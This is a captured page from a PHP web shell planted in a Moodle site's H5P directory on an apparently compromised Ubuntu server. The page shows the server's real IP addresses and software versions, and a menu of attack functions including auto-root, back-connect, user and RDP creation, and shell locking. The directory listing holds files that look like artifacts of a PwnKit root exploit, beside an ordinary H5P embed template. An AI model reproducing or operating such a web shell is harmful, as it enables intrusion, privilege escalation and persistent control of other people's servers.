Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
h5p /
h5plib /
v124 /
joubel /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
doc
[ DIR ]
drwxrwxrwx
fonts
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
styles
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
LICENSE.txt
34.32
KB
-rwxrwxrwx
README.txt
723
B
-rwxrwxrwx
embed.php
746
B
-rwxrwxrwx
h5p-default-storage.class.php
15.44
KB
-rwxrwxrwx
h5p-development.class.php
6.02
KB
-rwxrwxrwx
h5p-event-base.class.php
5.57
KB
-rwxrwxrwx
h5p-file-storage.interface.php
5.11
KB
-rwxrwxrwx
h5p-metadata.class.php
4.53
KB
-rwxrwxrwx
h5p.classes.php
164.61
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
readme_moodle.txt
2.62
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : embed.php
<!doctype html> <html lang="<?php print $lang; ?>" class="h5p-iframe"> <head> <meta charset="utf-8"> <title><?php print $content['title']; ?></title> <?php for ($i = 0, $s = count($scripts); $i < $s; $i++): ?> <script src="<?php print $scripts[$i]; ?>"></script> <?php endfor; ?> <?php for ($i = 0, $s = count($styles); $i < $s; $i++): ?> <link rel="stylesheet" href="<?php print $styles[$i]; ?>"> <?php endfor; ?> <?php if (!empty($additional_embed_head_tags)): print implode("\n", $additional_embed_head_tags); endif; ?> </head> <body> <div class="h5p-content" data-content-id="<?php print $content['id']; ?>"></div> <script> H5PIntegration = <?php print json_encode($integration); ?>; </script> </body> </html>
Close